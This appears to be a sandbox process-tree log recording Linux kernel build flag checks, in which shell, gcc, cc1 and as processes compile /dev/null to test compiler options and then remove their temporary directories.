/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Waddress-of-packed-member -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-address-of-packed-member\"; else echo \"\"; fi"3⤵PID:1770
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17704⤵PID:1771
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Waddress-of-packed-member -c -x c /dev/null -o /tmp/a/.tmp_1770/tmp4⤵PID:1772
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1770/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Waddress-of-packed-member "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccUUkTQo.s5⤵PID:1773
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccUUkTQo.s5⤵PID:1774
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccUUkTQo.s5⤵PID:1774
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccUUkTQo.s5⤵PID:1774
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccUUkTQo.s5⤵
- Writes file to tmp directory
PID:1774
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17704⤵PID:1775
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"--param=allow-store-data-races=0\"; else echo \"\"; fi"3⤵PID:1776
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17764⤵PID:1777
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" -c -x c /dev/null -o /tmp/a/.tmp_1776/tmp4⤵PID:1778
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17764⤵PID:1779
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-allow-store-data-races\"; else echo \"\"; fi"3⤵PID:1780
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17804⤵PID:1781
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -c -x c /dev/null -o /tmp/a/.tmp_1780/tmp4⤵
- Writes file to tmp directory
PID:1782 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1780/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-clash-protection -o /tmp/ccIWH5SU.s5⤵PID:1783
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1780/tmp /tmp/ccIWH5SU.s5⤵PID:1784
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1780/tmp /tmp/ccIWH5SU.s5⤵PID:1784
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1780/tmp /tmp/ccIWH5SU.s5⤵PID:1784
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1780/tmp /tmp/ccIWH5SU.s5⤵PID:1784
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17804⤵PID:1785
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wimplicit-fallthrough=5\"; else echo \"\"; fi"3⤵PID:1786
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17864⤵PID:1787
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -c -x c /dev/null -o /tmp/a/.tmp_1786/tmp4⤵
- Writes file to tmp directory
PID:1788 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1786/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-protector-strong -fstack-clash-protection -o /tmp/ccr7ECdW.s5⤵
- Writes file to tmp directory
PID:1789
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccr7ECdW.s5⤵PID:1790
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccr7ECdW.s5⤵PID:1790
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccr7ECdW.s5⤵PID:1790
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccr7ECdW.s5⤵
- Writes file to tmp directory
PID:1790
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17864⤵PID:1791
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wunused-but-set-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-but-set-variable\"; else echo \"\"; fi"3⤵PID:1792
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17924⤵PID:1793
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wunused-but-set-variable -c -x c /dev/null -o /tmp/a/.tmp_1792/tmp4⤵
- Writes file to tmp directory
PID:1794 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1792/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wunused-but-set-variable "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-protector-strong -fstack-clash-protection -o /tmp/cckdoJf4.s5⤵
- Writes file to tmp directory
PID:1795
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/cckdoJf4.s5⤵PID:1796
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/cckdoJf4.s5⤵PID:1796
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/cckdoJf4.s5⤵PID:1796
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/cckdoJf4.s5⤵PID:1796
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17924⤵PID:1797
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-const-variable\"; else echo \"\"; fi"3⤵PID:1798
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17984⤵PID:1799
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o /tmp/a/.tmp_1798/tmp4⤵
- Writes file to tmp directory
PID:1800 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1798/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=2" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-protector-strong -fstack-clash-protection -o /tmp/cc72BOqk.s5⤵PID:1801
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cc72BOqk.s5⤵PID:1802
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cc72BOqk.s5⤵PID:1802
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cc72BOqk.s5⤵PID:1802
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cc72BOqk.s5⤵PID:1802
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17984⤵PID:1803
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -Wdangling-pointer -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-dangling-pointer\"; else echo \"\"; fi"3⤵PID:1804
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18044⤵PID:1805
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -Wdangling-pointer -c -x c /dev/null -o /tmp/a/.tmp_1804/tmp4⤵PID:1806
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18044⤵PID:1807
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -fno-stack-clash-protection\"; else echo \"\"; fi"3⤵PID:1808
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18084⤵PID:1809
-
-
